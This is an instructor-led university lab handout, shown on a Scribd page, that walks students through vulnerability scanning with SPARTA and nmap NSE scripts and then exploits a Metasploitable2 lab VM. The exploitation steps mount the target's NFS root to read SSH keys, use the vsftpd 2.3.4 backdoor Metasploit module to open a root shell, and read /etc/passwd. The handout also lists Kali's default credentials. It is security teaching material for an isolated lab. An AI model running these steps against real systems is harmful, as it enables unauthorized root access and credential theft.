0% found this document useful (0 votes)
236 views5 pages

Lab 3 - Vulnerability Scanning and Exploitation Instructions - Mar 4

This document outlines a lab exercise focused on vulnerability scanning and exploitation using tools like SPARTA and Metasploit. Students will learn to identify vulnerabilities in computer systems, perform scans, and exploit known vulnerabilities in a controlled environment. The lab is designed for intermediate learners and includes specific tasks, materials needed, and safety warnings regarding penetration testing techniques.

Uploaded by

iccfinallive
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
236 views5 pages

Lab 3 - Vulnerability Scanning and Exploitation Instructions - Mar 4

This document outlines a lab exercise focused on vulnerability scanning and exploitation using tools like SPARTA and Metasploit. Students will learn to identify vulnerabilities in computer systems, perform scans, and exploit known vulnerabilities in a controlled environment. The lab is designed for intermediate learners and includes specific tasks, materials needed, and safety warnings regarding penetration testing techniques.

Uploaded by

iccfinallive
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

OCR@UC Lab _____________________________________________

LESSON TITLE: Lab 3 - Vulnerability Scanning and Exploitation

WARNING:
Warning: Any use of penetration testing techniques on a live network could result in expulsion
and/or criminal prosecution. Techniques are to be used in lab environments, for educational
use only or on networks for which you have explicit permission to test its defenses.

Level: Time Required: 60 minutes


☐Beginner ☐Advanced
☒Intermediate

Audience: ☒Instructor-led ☐Self-taught

Lesson Learning Outcomes: Upon completion of this lesson, students will be able to:
 Demonstrate the use of different vulnerability scanning tools.
 Identify vulnerabilities within a computer system.
 Demonstrate the use of pre-built tools to exploit a vulnerability in a computer system.

Materials List:
 Computers with Internet connection
 Browsers: Firefox (preferred), Google Chrome, or Internet Explorer
 Intro to Ethical Hacking lab environment

Introduction
In this lab we will explore methods of vulnerability scanning and exploitation using tools such
as SPARTA and Metasploit. Follow the steps below and answer all question in your own
words with as much detail as possible. Paste screen shots where requested. Include your
username in the filename.
Systems and tools needed:
 Kali Linux (u: root, p: toor)
 Metasploit2
 Windows XP (SP2)
 Ubuntu 12.04
 Power down all other systems on your network.
Module Activity Description:
Part One: Vulnerability Scanning with SPARTA

Create a New Target called ScanNetwork with the following settings:


 Manual IP: 192.168.2.0/24 (or Network Address of your network)
 Exclude Hosts: <IP Address of you Kali System>
 Port List: SPARTA Default
 Alive Test: Scan Config Default
Create a New Scan Task called DefaultScan with the following settings:
 Scan Targets: ScanNetwork
 Schedule: Select Once checkbox
 Add Results to Assets: Yes
 Leave all other defaults
Run the Scan you just created (This will take several minutes to complete)
Once completed, go to Scans>Results to view an overview of what the scan detected

Add 192.168.2.0/24 to the scope and run a full scan


1. Paste a screen shot of this page.

Create a Filtered Report of the results and download as a pdf file. Review the report and
Based on the Scan Results, answer the following questions:
2. Which of your systems had the most vulnerabilities?

3. Which port on the windows XP system showed vulnerabilities?

4. What CVE IDs are associated with the top vulnerability on your XP system?

5. What is the potential impact of this vulnerability being exploited?

6. Look at the top 2 vulnerabilities on the metasploit system. Describe how the scan
detected these vulnerabilities.
Module Activity Description:
Part Two: Vulnerability Detection with NMAP NSE
In this section, we will use prebuilt nmap NSE scripts to try and discover potential
vulnerabilities within our metasploit2 system. A list of all built in scripts can be found at
https://nmap.org/nsedoc/.
7. Determine the IP address of your metasploit2 system and record it here:

Run a service detection scan to determine the open ports and service info
nmap –sV <IP of system>
8. Paste a screen shot of the output.

Notice that Apache (httpd), Samba (smb), and NFS are services that are running on this system.
Let’s explore these.
Find which directories are accessible from NFS:
nmap --script nfs-ls <IP of system>

9. Paste a screen shot of the output.

Enumerate which users can access Samba shares:


nmap --script smb-enum-users <IP of system>

10. Paste a screenshot of the top of the script results.

11. Which user accounts are enabled for Samba?

Enumerate directories within http services:


nmap --script http-enum <IP of system>
12. List any directories that you think might contain any potential vulnerabilities?

Try out some more scripts on your own. Find 2 that reveal some vulnerability information.
13. Paste screen shots and descriptions of the two scripts below.
Module Activity Description:
Part Three: Exploiting Vulnerabilities
In this section we will look at some examples of exploiting known vulnerabilities. Keep in
mind; these are very simple examples that should be patched on most systems. DO NOT
attempt to run these or any exploits on a system you are not authorized to do so on.
Above we discovered NFS directories that were available. Now we will attempt to mount the root
of the system to access these directories.

First install nfs client:


apt-get install nfs-common
Check to see which directories are mountable:
nmap --script nfs-showmount <IP of system>
Info: It appears the root (/) is mountable, so now mount it to your Kali system:
mkdir /tmp/nfs
mount –o nolock –t nfs <IP of system>:/ /tmp/nfs
Now you can navigate and read the files on the metasploitable system within the /tmp/nfs. Run a
directory listing on the /tmp/nfs directory.
1. Paste a screen shot of directory.

Now let’s see what we can access. Navigate to the msfadmin users home directory and find the
hidden ssh directory.
cd /tmp/nfs/home/msfadmin/.ssh
Open the authorized_keys file

2. Paste a screen shot of the file contents.

Info: You just found the admin users ssh encryption key

Using Metasploit framework to run an exploit


In our port scans, we discovered that vsftpd version 2.3.4 was running. This version of the
service had a well know backdoor that we installed by a malicious developer. We can use a
Metasploit module to exploit this vulnerability.
Start you msfconsole and select the module to run the exploit
use exploit/unix/ftp/vsftpd_234_backdoor
Set the target to your metasploit system
set RHOST <IP of system>
show targets
set TARGET 0
Verify targets and exploit
show options
exploit
This opened a telnet session as a root user. Run a few commands to test it out:
whoami
hostname
grep root /etc/passwd
3. Paste a screen shot of these commands.

Info: The last command gave you the password hash for the root user. This could come in
handy later.
Find another exploitable payload that will run against metasploitable2. (There are tons of
guides available on the Internet).
4. Provide screen shots of running the exploit. Then answer the following questions.

5. What service did this exploit use?

6. What is the CVE ID and description of the vulnerability that it took advantage of?

7. What were you able to access after successfully running the exploit?

You might also like